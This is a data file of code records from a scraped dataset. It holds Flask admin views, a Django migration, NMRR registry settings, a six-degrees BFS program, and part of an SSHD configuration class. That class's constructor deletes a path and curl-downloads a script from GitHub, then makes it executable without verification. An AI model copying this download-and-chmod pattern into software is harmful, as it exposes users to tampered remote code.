check_admin()\n roles = Role.query.all()\n return render_template('list_roles.html', roles=roles, title='roles')\n\n@admin.route('/roles/add', methods=['GET','POST'])\n@login_required\ndef add_role():\n \"\"\"\n add a role into database\n \"\"\"\n check_admin()\n add_role = True\n form = RoleForm()\n if form.validate_on_submit():\n\n # add the new role to database if the role name is not duplicated\n try:\n role = Role(name=form.name.data, description=form.description.data)\n db.session.add(role)\n db.session.commit()\n flash('You has successfully added a new role')\n\n except:\n # if the duplicated entry is found\n flash('Errors: role name already existed')\n #return to roles list\n return redirect(url_for('admin.list_roles'))\n # render to form where can fill up the name and description\n return render_template('role.html', add_role=add_role, form=form, title='Add role')\n\n\n@admin.route('/roles/edit/', methods=['GET','POST'])\n@login_required\ndef edit_role(id):\n \"\"\"\n edit one role\n \"\"\"\n check_admin()\n add_role=False\n role = Role.query.get_or_404(id)\n form = RoleForm(object=role)\n if form.validate_on_submit():\n # update current role\n role.name = form.name.data\n role.description = form.description.data\n db.session.commit()\n flash('You have successfully updated the role')\n redirect(url_for('admin.list_roles'))\n form.name.data = role.name\n form.description.data = role.description\n return render_template('role.html', add_role=add_role, form=form, title='Edit role')\n\n\n@admin.route('/roles/delete/', methods=['GET','POST'])\n@login_required\ndef delete_role(id):\n \"\"\"\n\n delete a role\n \"\"\"\n check_admin()\n add_role=False\n role = Role.query.get_or_404(id)\n db.session.delete(role)\n db.session.commit()\n flash('You have successfully deleted a role')\n\n #redirect to roles list\n return redirect(url_for('admin.list_roles'))\n\n return render_template(title='Delete role')\n\n\n@admin.route('/employees')\n@login_required\ndef list_employees():\n \"\"\"\n assign department and role to employee\n \"\"\"\n check_admin()\n employees = Employee.query.all()\n return render_template('list_employees.html', employees=employees, title='Employees')\n\n@admin.route('/employee/assign/', methods=['GET','POST'])\n@login_required\ndef assign_employee(id):\n \"\"\"\n assign a department and role to employee\n \"\"\"\n check_admin()\n employee = Employee.query.get_or_404(id)\n if employee.is_admin:\n abort(403)\n\n form = EmployeeAssignForm(obj=employee)\n if form.validate_on_submit():\n employee.department = form.department.data\n employee.role = form.role.data\n db.session.add(employee)\n db.session.commit()\n\n flash('You have successfully assign department and role to employee')\n return redirect(url_for('admin.list_employees'))\n return render_template('employee.html', employee=employee, form=form, title='Assign Employee')","sub_path":"app/admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"496930533","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n ('CRM', '0010_auto_20160521_1410'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='appointment',\n name='record',\n field=models.OneToOneField(related_name='appointments', null=True,\n verbose_name=b'\\xe5\\x92\\xa8\\xe8\\xaf\\xa2\\xe8\\xae\\xb0\\xe5\\xbd\\x95',\n to='CRM.Record'),\n ),\n ]\n","sub_path":"CRM/migrations/0011_auto_20160521_1411.py","file_name":"0011_auto_20160521_1411.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"137202724","text":"\"\"\"\nDjango settings for the nmrr project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/2.2/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/2.2/ref/settings/\n\"\"\"\nimport os\n\nfrom core_main_app.utils.logger.logger_utils import (\n set_generic_handler,\n set_generic_logger,\n update_logger_with_local_app,\n)\nfrom mongoengine.connection import connect\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = False\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = os.environ[\"DJANGO_SECRET_KEY\"]\n# SECURITY WARNING: only list host/domain names that this Django site can serve\nALLOWED_HOSTS = os.environ[\"ALLOWED_HOSTS\"].split(\",\") if \"ALLOWED_HOSTS\" in os.environ else []\n# SERVER URI\nSERVER_URI = os.environ[\"SERVER_URI\"]\n\n# Databases\n\nDATABASES = {\n \"default\": {\n \"ENGINE\": \"django.db.backends.postgresql_psycopg2\",\n \"HOST\": os.environ[\"POSTGRES_HOST\"] if \"POSTGRES_HOST\" in os.environ else None,\n \"PORT\": int(os.environ[\"POSTGRES_PORT\"]) if \"POSTGRES_PORT\" in os.environ else 5432,\n \"NAME\": os.environ[\"POSTGRES_DB\"] if \"POSTGRES_DB\" in os.environ else None,\n \"USER\": os.environ[\"POSTGRES_USER\"] if \"POSTGRES_USER\" in os.environ else None,\n \"PASSWORD\": os.environ[\"POSTGRES_PASS\"] if \"POSTGRES_PASS\" in os.environ else None,\n }\n}\n\nMONGO_HOST = os.environ[\"MONGO_HOST\"] if \"MONGO_HOST\" in os.environ else \"\"\nMONGO_PORT = os.environ[\"MONGO_PORT\"] if \"MONGO_PORT\" in os.environ else \"27017\"\nMONGO_DB = os.environ[\"MONGO_DB\"] if \"MONGO_DB\" in os.environ else \"\"\nMONGO_USER = os.environ[\"MONGO_USER\"] if \"MONGO_USER\" in os.environ else \"\"\nMONGO_PASS = os.environ[\"MONGO_PASS\"] if \"MONGO_PASS\" in os.environ else \"\"\nMONGODB_URI = (\n f\"mongodb://{MONGO_USER}:{MONGO_PASS}@{MONGO_HOST}:{MONGO_PORT}/{MONGO_DB}\"\n)\nconnect(MONGO_DB, host=MONGODB_URI)\n\n\nBROKER_TRANSPORT_OPTIONS = {\n \"visibility_timeout\": 3600,\n \"fanout_prefix\": True,\n \"fanout_patterns\": True,\n}\nREDIS_HOST = os.environ[\"REDIS_HOST\"] if \"REDIS_HOST\" in os.environ else \"\"\nREDIS_PORT = os.environ[\"REDIS_PORT\"] if \"REDIS_PORT\" in os.environ else \"6379\"\nREDIS_PASS = os.environ[\"REDIS_PASS\"] if \"REDIS_PASS\" in os.environ else None\nREDIS_URL = f\"redis://:{REDIS_PASS}@{REDIS_HOST}:{REDIS_PORT}\"\n\nBROKER_URL = REDIS_URL\nCELERY_RESULT_BACKEND = REDIS_URL\n\n# Label customization\nWEBSITE_SHORT_TITLE = \"NMRR\"\nCUSTOM_DATA = \"Materials Data\"\nCUSTOM_NAME = os.environ[\"SERVER_NAME\"]\nCUSTOM_TITLE = \"Materials Resource Registry\"\nCUSTOM_SUBTITLE = \"Part of the Materials Genome Initiative\"\nCURATE_MENU_NAME = \"Publish resource\"\nEXPLORE_MENU_NAME = \"Search for resources\"\nWEBSITE_ADMIN_COLOR = \"blue\"\n# black, black-light, blue, blue-light, green, green-light, purple, purple-light, red, red-light, yellow, yellow-light\n\nif SERVER_URI.lower().startswith(\"https\"):\n # Activate HTTPS\n os.environ[\"HTTPS\"] = \"on\"\n\n # Secure cookies\n CSRF_COOKIE_SECURE = True\n CSRF_COOKIE_AGE = None\n SESSION_COOKIE_SECURE = True\n SESSION_EXPIRE_AT_BROWSER_CLOSE = True\n SESSION_COOKIE_AGE = 604800\n\n # Set x-frame options\n X_FRAME_OPTIONS = \"SAMEORIGIN\"\n\n# Application definition\nINSTALLED_APPS = (\n \"django.contrib.admin\",\n \"django.contrib.auth\",\n \"django.contrib.contenttypes\",\n \"django.contrib.sessions\",\n \"django.contrib.messages\",\n \"django.contrib.sites\",\n \"django.contrib.staticfiles\",\n # Extra apps\n \"rest_framework\",\n \"drf_yasg\",\n \"rest_framework_mongoengine\",\n \"menu\",\n \"tz_detect\",\n \"defender\",\n \"captcha\",\n # Core apps\n \"core_main_app\",\n \"core_main_registry_app\",\n \"core_website_app\",\n \"core_oaipmh_common_app\",\n \"core_oaipmh_harvester_app\",\n \"core_oaipmh_provider_app\",\n \"core_curate_registry_app\",\n \"core_curate_app\",\n \"core_parser_app\",\n \"core_parser_app.tools.modules\", # FIXME: make modules an app\n \"core_parser_app.tools.parser\", # FIXME: make parser an app\n \"core_explore_keyword_registry_app\", # /!\\ Should always be before core_explore_common_app\n \"core_explore_keyword_app\",\n \"core_explore_common_app\",\n \"core_explore_oaipmh_app\",\n \"core_dashboard_registry_app\",\n \"core_dashboard_common_app\",\n \"mptt\",\n \"core_linked_records_app\",\n # Modules\n \"core_module_local_id_registry_app\",\n \"core_module_status_registry_app\",\n \"core_module_fancy_tree_registry_app\",\n \"core_module_text_area_app\",\n # Local apps\n \"nmrr_home\",\n)\nMIDDLEWARE = (\n \"django.contrib.sessions.middleware.SessionMiddleware\",\n \"django.middleware.locale.LocaleMiddleware\",\n \"django.middleware.common.CommonMiddleware\",\n \"django.middleware.csrf.CsrfViewMiddleware\",\n \"django.contrib.auth.middleware.AuthenticationMiddleware\",\n \"defender.middleware.FailedLoginMiddleware\",\n \"django.contrib.messages.middleware.MessageMiddleware\",\n \"django.middleware.clickjacking.XFrameOptionsMiddleware\",\n \"django.middleware.security.SecurityMiddleware\",\n \"tz_detect.middleware.TimezoneMiddleware\",\n)\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nROOT_URLCONF = \"nmrr.urls\"\n\nTEMPLATES = [\n {\n \"BACKEND\": \"django.template.backends.django.DjangoTemplates\",\n \"DIRS\": [\"templates\"],\n \"APP_DIRS\": True,\n \"OPTIONS\": {\n \"context_processors\": [\n \"django.template.context_processors.debug\",\n \"django.template.context_processors.request\",\n \"django.contrib.auth.context_processors.auth\",\n \"django.contrib.messages.context_processors.messages\",\n \"core_main_app.utils.custom_context_processors.domain_context_processor\", # Needed by any curator app\n \"django.template.context_processors.i18n\",\n ],\n },\n },\n]\n\nWSGI_APPLICATION = \"nmrr.wsgi.application\"\n\n# Internationalization\n# https://docs.djangoproject.com/en/2.2/topics/i18n/\n\nLANGUAGE_CODE = \"en-us\"\n\nTIME_ZONE = \"UTC\"\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nLOCALE_PATHS = (os.path.join(BASE_DIR, \"locale\"),)\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/2.2/howto/static-files/\n\nSTATIC_URL = \"/static/\"\nSTATIC_ROOT = \"static.prod\"\n\nSTATICFILES_FINDERS = (\n \"django.contrib.staticfiles.finders.AppDirectoriesFinder\",\n \"django.contrib.staticfiles.finders.FileSystemFinder\",\n)\n\nSTATICFILES_DIRS = (\"static\",)\n\n# Logging\nLOGGING_SERVER = True\nLOGGING_CLIENT = True\nLOGGING_DB = True\n\nLOGGER_FILE_SERVER = os.path.join(BASE_DIR, \"logfile_server.txt\")\nLOGGER_FILE_CLIENT = os.path.join(BASE_DIR, \"logfile_client.txt\")\nLOGGER_FILE_DB = os.path.join(BASE_DIR, \"logfile_db.txt\")\nLOGGER_FILE_SECURITY = os.path.join(BASE_DIR, \"logfile_security.txt\")\nLOGGER_FILE_APP = os.path.join(BASE_DIR, \"logfile_app.txt\")\n\nLOGGER_LEVEL = os.getenv(\"DJANGO_LOG_LEVEL\", \"DEBUG\")\nLOGGER_CLIENT_LEVEL = os.getenv(\"DJANGO_LOG_LEVEL\", \"DEBUG\")\nLOGGER_SERVER_LEVEL = os.getenv(\"DJANGO_LOG_LEVEL\", \"DEBUG\")\nLOGGER_DB_LEVEL = os.getenv(\"DJANGO_LOG_LEVEL\", \"DEBUG\")\nLOGGER_APP_LEVEL = os.getenv(\"DJANGO_LOG_LEVEL\", \"DEBUG\")\n\nLOGGER_MAX_BYTES = 500000\nLOGGER_BACKUP_COUNT = 2\n\nlocal_logger_conf = {\n \"handlers\": [\"app_handler\", \"console\"],\n \"level\": LOGGER_APP_LEVEL,\n}\n\nLOGGING = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"formatters\": {\n \"fmt-default\": {\n \"format\": \"%(levelname)s: %(asctime)s\\t%(name)s\\t%(pathname)s\\tl.%(lineno)s\\t%(message)s\",\n \"datefmt\": \"%Y-%m-%d %H:%M:%S\",\n },\n },\n \"handlers\": {\n \"logfile-security\": {\n \"level\": \"DEBUG\",\n \"class\": \"logging.handlers.RotatingFileHandler\",\n \"filename\": LOGGER_FILE_SECURITY,\n \"maxBytes\": LOGGER_MAX_BYTES,\n \"backupCount\": LOGGER_BACKUP_COUNT,\n \"formatter\": \"fmt-default\",\n },\n \"console\": {\n \"level\": \"INFO\",\n \"class\": \"logging.StreamHandler\",\n \"formatter\": \"fmt-default\",\n },\n \"app_handler\": {\n \"level\": LOGGER_APP_LEVEL,\n \"class\": \"logging.handlers.RotatingFileHandler\",\n \"filename\": LOGGER_FILE_APP,\n \"maxBytes\": LOGGER_MAX_BYTES,\n \"backupCount\": LOGGER_BACKUP_COUNT,\n \"formatter\": \"fmt-default\",\n },\n },\n \"loggers\": {\n \"django.security\": {\n \"handlers\": [\"console\", \"logfile-security\"],\n \"level\": LOGGER_LEVEL,\n \"propagate\": True,\n },\n },\n}\n\nupdate_logger_with_local_app(LOGGING, local_logger_conf, INSTALLED_APPS)\n\nif LOGGING_CLIENT:\n set_generic_handler(\n LOGGING,\n \"logfile-template\",\n LOGGER_CLIENT_LEVEL,\n LOGGER_FILE_CLIENT,\n LOGGER_MAX_BYTES,\n LOGGER_BACKUP_COUNT,\n \"logging.handlers.RotatingFileHandler\",\n )\n set_generic_logger(\n LOGGING, \"django.template\", LOGGER_CLIENT_LEVEL, [\"console\", \"logfile-template\"]\n )\n set_generic_handler(\n LOGGING,\n \"logfile-request\",\n LOGGER_CLIENT_LEVEL,\n LOGGER_FILE_CLIENT,\n LOGGER_MAX_BYTES,\n LOGGER_BACKUP_COUNT,\n \"logging.handlers.RotatingFileHandler\",\n )\n set_generic_logger(\n LOGGING, \"django.request\", LOGGER_CLIENT_LEVEL, [\"console\", \"logfile-request\"]\n )\n\nif LOGGING_SERVER:\n set_generic_handler(\n LOGGING,\n \"logfile-server\",\n LOGGER_SERVER_LEVEL,\n LOGGER_FILE_SERVER,\n LOGGER_MAX_BYTES,\n LOGGER_BACKUP_COUNT,\n \"logging.handlers.RotatingFileHandler\",\n )\n set_generic_logger(\n LOGGING, \"django.server\", LOGGER_SERVER_LEVEL, [\"console\", \"logfile-server\"]\n )\n\nif LOGGING_DB:\n set_generic_handler(\n LOGGING,\n \"logfile-django-db-backend\",\n LOGGER_DB_LEVEL,\n LOGGER_FILE_DB,\n LOGGER_MAX_BYTES,\n LOGGER_BACKUP_COUNT,\n \"logging.handlers.RotatingFileHandler\",\n )\n set_generic_logger(\n LOGGING,\n \"django.db.backends\",\n LOGGER_DB_LEVEL,\n [\"console\", \"logfile-django-db-backend\"],\n )\n\n# Password settings for django.contrib.auth validators\n# Specifies the minimum length for passwords.\nPASSWORD_MIN_LENGTH = 5\n# Specifies the minimum amount of required letters in a password.\nPASSWORD_MIN_LETTERS = 0\n# Specifies the minimum amount of required uppercase letters in a password.\nPASSWORD_MIN_UPPERCASE_LETTERS = 0\n# Specifies the minimum amount of required lowercase letters in a password.\nPASSWORD_MIN_LOWERCASE_LETTERS = 0\n# Specifies the minimum amount of required numbers in a password.\nPASSWORD_MIN_NUMBERS = 0\n# Specifies the minimum amount of required symbols in a password.\nPASSWORD_MIN_SYMBOLS = 0\n# Specifies the maximum amount of consecutive characters allowed in passwords.\nPASSWORD_MAX_OCCURRENCE = None\n\nMENU_SELECT_PARENTS = False\n\"\"\" boolean: Control if parent menu items should automatically have their selected property set to True if one of \ntheir children has its selected property set to True\n\"\"\"\n\nDATA_SOURCES_EXPLORE_APPS = [\"core_explore_oaipmh_app\"]\n\"\"\" List of data sources for the exploration apps\n\"\"\"\n\nSWAGGER_SETTINGS = {\n \"exclude_namespaces\": [], # List URL namespaces to ignore\n \"api_version\": \"1.1\", # Specify your API's version\n \"api_path\": \"/\", # Specify the path to your API not a root level\n \"enabled_methods\": [ # Specify which methods to enable in Swagger UI\n \"get\",\n \"post\",\n \"put\",\n \"patch\",\n \"delete\",\n ],\n \"api_key\": \"\", # An API key\n \"is_authenticated\": False, # Set to True to enforce user authentication,\n \"is_superuser\": False, # Set to True to enforce admin only access\n \"LOGIN_URL\": \"core_main_app_login\",\n \"LOGOUT_URL\": \"core_main_app_logout\",\n}\n\nREST_FRAMEWORK = {\n \"DEFAULT_AUTHENTICATION_CLASSES\": (\n \"rest_framework.authentication.BasicAuthentication\",\n \"rest_framework.authentication.SessionAuthentication\",\n ),\n}\n\n# Registry configuration\nREGISTRY_XSD_FILENAME = \"res-md.xsd\"\n\"\"\" str: Registry xsd filename used for the initialisation.\n\"\"\"\n\n# If you want to use your own schema, set your schema here\nREGISTRY_XSD_FILEPATH = os.path.join(\"xsd\", REGISTRY_XSD_FILENAME)\n\"\"\" str: Registry xsd path used for the initialisation.\n\"\"\"\n\n# If you want to use your own configuration file, set your configuration file here\nCUSTOM_REGISTRY_FILE_PATH = os.path.join(\"json\", \"custom_registry.json\")\n\"\"\" str: Custom registry configuration file path used for the initialisation.\n\"\"\"\n\nDEFAULT_DATA_RENDERING_XSLT = os.path.join(\n \"core_main_registry_app\", \"xsl\", \"xml2html.xsl\"\n)\n\nPARSER_DOWNLOAD_DEPENDENCIES = True\n\"\"\" boolean: Should the XSD parser download dependencies\n\"\"\"\n\nEXPLORE_ADD_DEFAULT_LOCAL_DATA_SOURCE_TO_QUERY = True\n\"\"\" boolean: Do we add the local data source to new queries by default\n\"\"\"\n\nSSL_CERTIFICATES_DIR = True\n\"\"\" boolean: Control whether requests verify the server's TLS certificate\n string: Path to a CA bundle\n\"\"\"\n\nVERIFY_DATA_ACCESS = False\n\"\"\" :py:class:`bool`: Additional checks that data returned by a query can be accessed (slow).\n\"\"\"\n\nDISPLAY_EDIT_BUTTON = False\n\"\"\" boolean: Display the edit button on the result page\n\"\"\"\n\nDATA_SORTING_FIELDS = [\"-last_modification_date\"]\n\"\"\" Array: Default sort fields for the data query. \n\"\"\"\n\nDATA_DISPLAYED_SORTING_FIELDS = [\n {\n \"field\": \"last_modification_date\",\n \"display\": \"Last updated\",\n \"ordering\": \"-last_modification_date\",\n },\n {\n \"field\": \"last_modification_date\",\n \"display\": \"First updated\",\n \"ordering\": \"+last_modification_date\",\n },\n {\"field\": \"title\", \"display\": \"Title (A-Z)\", \"ordering\": \"+title\"},\n {\"field\": \"title\", \"display\": \"Title (Z-A)\", \"ordering\": \"-title\"},\n]\n\"\"\"The default sorting fields displayed on the GUI, Data model field Array\"\"\"\n\nSORTING_DISPLAY_TYPE = \"single\"\n\"\"\"Result sorting graphical display type ('multi' / 'single')\"\"\"\n\nDEFAULT_DATE_TOGGLE_VALUE = False\n\"\"\" boolean: Set the toggle default value in the records list\n\"\"\"\n\n# Configure Django Defender\nDEFENDER_REDIS_URL = REDIS_URL\n\"\"\" :py:class:`str`: The Redis url for defender. \n\"\"\"\nDEFENDER_COOLOFF_TIME = 60\n\"\"\" integer: Period of inactivity after which old failed login attempts will be forgotten\n\"\"\"\nDEFENDER_LOGIN_FAILURE_LIMIT = 3\n\"\"\" integer: The number of login attempts allowed before a record is created for the failed login.\n\"\"\"\nDEFENDER_STORE_ACCESS_ATTEMPTS = True\n\"\"\" boolean: Store the login attempt to the database.\n\"\"\"\nDEFENDER_USE_CELERY = True\n\"\"\" boolean: Use Celery to store the login attempt to the database.\n\"\"\"\nDEFENDER_LOCKOUT_URL = \"/locked\"\n\"\"\" string: url to the defender error page (defined in core_main_registry_app)\n\"\"\"\nDISPLAY_PRIVACY_POLICY_FOOTER = True\n\"\"\" boolean: display the privacy policy link in the footer\n\"\"\"\nDISPLAY_TERMS_OF_USE_FOOTER = True\n\"\"\" boolean: display the terms of use link in the footer\n\"\"\"\nDISPLAY_CONTACT_FOOTER = True\n\"\"\" boolean: display the contact link in the footer\n\"\"\"\nDISPLAY_HELP_FOOTER = True\n\"\"\" boolean: display the help link in the footer\n\"\"\"\nDISPLAY_RULES_OF_BEHAVIOR_FOOTER = True\n\"\"\" boolean: display the rules of behavior link in the footer\n\"\"\"\n\nAUTO_SET_PID = True\n\"\"\" boolean: enable the automatic pid generation for saved data.\n\"\"\"\n\nID_PROVIDER_SYSTEMS = {\n \"local\": {\n \"class\": \"core_linked_records_app.utils.providers.local.LocalIdProvider\",\n \"args\": [],\n },\n}\n\"\"\" dict: provider systems available for registering PIDs\n\"\"\"\n\nID_PROVIDER_PREFIXES = [\"cdcs\"]\n\"\"\" list: accepted prefixes if manually specifying PIDs (first item is the\ndefault prefix)\n\"\"\"\n\nPID_XPATH = \"Resource.@localid\"\n\"\"\" string: location of the PID in the document, specified as dot notation\n\"\"\"\n\nCAN_SET_WORKSPACE_PUBLIC = False\n\"\"\" boolean: Can make a private workspace public\n\"\"\"\n\nCAN_SET_PUBLIC_DATA_TO_PRIVATE = False\n\"\"\" boolean: Can public data be made private\n\"\"\"\n\nCAN_ANONYMOUS_ACCESS_PUBLIC_DOCUMENT = True\n\"\"\" boolean: Can anonymous users access public data\n\"\"\"\n","sub_path":"deploy/cdcs/nmrr.settings.py","file_name":"nmrr.settings.py","file_ext":"py","file_size_in_byte":16059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"277973791","text":"import csv\nimport sys\nimport math\n\nfrom util import Node, StackFrontier, QueueFrontier\n\n# Maps names to a set of corresponding person_ids\nnames = {}\n\n# Maps person_ids to a dictionary of: name, birth, movies (a set of movie_ids)\npeople = {}\n\n# Maps movie_ids to a dictionary of: title, year, stars (a set of person_ids)\nmovies = {}\n\n\ndef load_data(directory):\n \"\"\"\n Load data from CSV files into memory.\n \"\"\"\n # Load people\n with open(f\"{directory}/people.csv\", encoding=\"utf-8\") as f:\n reader = csv.DictReader(f)\n for row in reader:\n people[row[\"id\"]] = {\n \"name\": row[\"name\"],\n \"birth\": row[\"birth\"],\n \"movies\": set()\n }\n if row[\"name\"].lower() not in names:\n names[row[\"name\"].lower()] = {row[\"id\"]}\n else:\n names[row[\"name\"].lower()].add(row[\"id\"])\n\n # Load movies\n with open(f\"{directory}/movies.csv\", encoding=\"utf-8\") as f:\n reader = csv.DictReader(f)\n for row in reader:\n movies[row[\"id\"]] = {\n \"title\": row[\"title\"],\n \"year\": row[\"year\"],\n \"stars\": set()\n }\n\n # Load stars\n with open(f\"{directory}/stars.csv\", encoding=\"utf-8\") as f:\n reader = csv.DictReader(f)\n for row in reader:\n try:\n people[row[\"person_id\"]][\"movies\"].add(row[\"movie_id\"])\n movies[row[\"movie_id\"]][\"stars\"].add(row[\"person_id\"])\n except KeyError:\n pass\n\n\ndef main():\n if len(sys.argv) > 2:\n sys.exit(\"Usage: python degrees.py [directory]\")\n directory = sys.argv[1] if len(sys.argv) == 2 else \"large\"\n\n # Load data from files into memory\n print(\"Loading data...\")\n load_data(directory)\n print(\"Data loaded.\")\n\n source = person_id_for_name(input(\"Name: \"))\n if source is None:\n sys.exit(\"Person not found.\")\n target = person_id_for_name(input(\"Name: \"))\n if target is None:\n sys.exit(\"Person not found.\")\n\n path = shortest_path(source, target)\n\n if path is None:\n print(\"Not connected.\")\n else:\n degrees = len(path)\n print(f\"{degrees} degrees of separation.\")\n path = [(None, source)] + path\n for i in range(degrees):\n person1 = people[path[i][1]][\"name\"]\n person2 = people[path[i + 1][1]][\"name\"]\n movie = movies[path[i + 1][0]][\"title\"]\n print(f\"{i + 1}: {person1} and {person2} starred in {movie}\")\n\n\ndef check_if_goal(node, target):\n \"\"\"\n Checks if current node is the target node\n if so returns a Path of actions to that node\n if not returns None\n \"\"\"\n\n # If this is the target we seek\n # Add the path to target to solutions list\n if node.state == target:\n path = []\n targetNode = node\n while targetNode.parent is not None:\n path.append(targetNode.action)\n targetNode = targetNode.parent\n path.reverse()\n return path\n return None\n\n\ndef shortest_path(source, target):\n \"\"\"\n Returns the shortest list of (movie_id, person_id) pairs\n that connect the source to the target.\n\n If no possible path, returns None.\n \"\"\"\n\n # Set source as root node\n start = Node(state=source, parent=None, action=None)\n\n # Initialize frontier with a Queue.\n # We use breadth-first search and hence a queue to ensure\n # that we find the most optimal (shortest) solution\n\n frontier = QueueFrontier()\n\n # Set of visited nodes\n explored_people = set()\n\n # Check if start is target\n goal = check_if_goal(start, target)\n\n # If start is target, end search\n if goal is not None:\n return goal\n\n # Add root node to frontier\n frontier.add(start)\n\n # Repeat until frontier is empty\n while True:\n if frontier.empty():\n break\n # Get the first node in the queue\n node = frontier.remove()\n\n # Mark the current node as explored by adding it to explored set\n explored_people.add(node.state)\n\n # Add node's neighbors to frontier\n for movie, person in neighbors_for_person(node.state):\n if not frontier.contains_state(\n person) and person not in explored_people:\n child = Node(state=person, parent=node, action=(movie, person))\n path = check_if_goal(child, target)\n if path is not None:\n return path\n else:\n frontier.add(child)\n return None\n\n\ndef person_id_for_name(name):\n \"\"\"\n Returns the IMDB id for a person's name,\n resolving ambiguities as needed.\n \"\"\"\n person_ids = list(names.get(name.lower(), set()))\n if len(person_ids) == 0:\n return None\n elif len(person_ids) > 1:\n print(f\"Which '{name}'?\")\n for person_id in person_ids:\n person = people[person_id]\n name = person[\"name\"]\n birth = person[\"birth\"]\n print(f\"ID: {person_id}, Name: {name}, Birth: {birth}\")\n try:\n person_id = input(\"Intended Person ID: \")\n if person_id in person_ids:\n return person_id\n except ValueError:\n pass\n return None\n else:\n return person_ids[0]\n\n\ndef neighbors_for_person(person_id):\n \"\"\"\n Returns (movie_id, person_id) pairs for people\n who starred with a given person.\n \"\"\"\n movie_ids = people[person_id][\"movies\"]\n neighbors = set()\n for movie_id in movie_ids:\n for person_id in movies[movie_id][\"stars\"]:\n neighbors.add((movie_id, person_id))\n return neighbors\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"week 0/projects/degrees/degrees.py","file_name":"degrees.py","file_ext":"py","file_size_in_byte":5742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"503539090","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# imports.\nfrom ssht00ls.classes.config import *\nfrom ssht00ls.classes import utils\nfrom ssht00ls.classes.smartcards import smartcards\nfrom ssht00ls.classes.installation import installation\n\n# the sshd object class.\nclass SSHD(object):\n\tdef __init__(self):\n\t\t\n\t\t# check downloads.\n\t\tif CHECKS:\n\t\t\tutils_lib = gfp.clean(path=f\"{SOURCE_PATH}/classes/utils/\")\n\t\t\tfor subpath, url in [\n\t\t\t\t[\"handler\", \"https://raw.githubusercontent.com/vandenberghinc/ssht00ls/master/ssht00ls/classes/utils/handler\"],\n\t\t\t]:\n\t\t\t\tfull_path = gfp.clean(f\"{utils_lib}/{subpath}\")\n\t\t\t\tos.system(f\"rm -fr {full_path}\")\n\t\t\t\tos.system(f\"curl -s {url} -o {full_path} && chmod +x {full_path}\")\n\t\t\t\tif not os.path.exists(full_path):\n\t\t\t\t\traise exceptions.ModuleError(\"Failed to install the ssht00ls utils (#1).\")\n\n\tdef create(self,\n\t\t# save the configuration & banner.\n\t\tsave=False,\n\t\t# the ssh port.\n\t\tport=22,\n\t\t# the listen addresses.\n\t\tlisten_addresses=[],\n\t\t# the server's banner.\n\t\tbanner=\"Hello World!\",\n\t\t# the allowed users & options.\n\t\tusers={\n\t\t\t# define per user (all keys are optional).\n\t\t\t\"administrator\": {\n\t\t\t\t# the user's root permissions.\n\t\t\t\t\"root_permissions\":False,\n\t\t\t\t# authentication by password.\n\t\t\t\t\"password_authentication\":False,\n\t\t\t\t# authentication by keys.\n\t\t\t\t\"key_authentication\":True,\n\t\t\t\t# ip filter.\n\t\t\t\t\"ip_filter\":False,\n\t\t\t\t\"allowed_ips\":[],\n\t\t\t\t# sftp server only.\n\t\t\t\t\"sftp_only\":False,\n\t\t\t\t# the chroot directory (leave null to disable).\n\t\t\t\t\"chroot_directory\":None,\n\t\t\t\t# allowed connection options.\n\t\t\t\t\"x11_forwarding\":False,\n\t\t\t\t\"tcp_forwarding\":False,\n\t\t\t\t\"permit_tunnel\":False,\n\t\t\t\t\"allow_stream_local_forwarding\":False,\n\t\t\t\t\"gateway_ports\":False,\n\t\t\t},\n\t\t},\n\t):\n\n\t\t# check users.\n\t\tresponse = self.__check_user_items__(users)\n\t\tif response[\"error\"] != None: return response\n\n\t\t# check utils intalled (must be before __install_banner__).\n\t\tresponse = self.__check_utils_installed__(list(users.keys()))\n\t\tif response[\"error\"] != None: return response\n\n\t\t# intall banner.\n\t\tif save:\n\t\t\tresponse = self.__install_banner__(banner=banner, usernames=list(users.keys()))\n\t\t\tif response[\"error\"] != None: return response\n\n\t\t# defaults.\n\t\tconfiguration = '# SSHD_CONFIG:'\n\t\tconfiguration += '\\n# BY VANDENBERGHINC'\n\t\tconfiguration += '\\n# MODULE: ssht00ls'\n\t\tconfiguration += '\\n# AUTHOR: DAAN VAN DEN BERGH'\n\t\tconfiguration += '\\nAcceptEnv LANG LC_*'\n\t\tconfiguration += '\\nSubsystem sftp internal-sftp'\n\t\t#configuration += '\\nSubsystem sftp /usr/libexec/sftp-server'\n\t\tconfiguration += '\\nLoginGraceTime 60'\n\t\tconfiguration += '\\nMaxAuthTries 3'\n\t\tconfiguration += '\\nMaxSessions 10'\n\t\tconfiguration += \"\\nMaxStartups 999\"\n\t\tconfiguration += '\\nLogLevel VERBOSE'\n\t\tconfiguration += f'\\nPort {port}'\n\t\tconfiguration += '\\nProtocol 2'\n\n\t\t# defaults.\n\t\tconfiguration += '\\nPermitRootLogin {}'.format(\"no\")\n\t\tconfiguration += '\\nStrictModes {}'.format(\"yes\")\n\t\tconfiguration += '\\nPermitUserEnvironment {}'.format(\"no\")\n\t\tconfiguration += '\\nIgnoreRhosts {}'.format(\"yes\")\n\t\tconfiguration += '\\nPermitTunnel {}'.format(\"no\")\n\t\tconfiguration += '\\nX11Forwarding {}'.format(\"no\")\n\t\tconfiguration += '\\nAllowTcpForwarding {}'.format(\"no\")\n\t\tconfiguration += 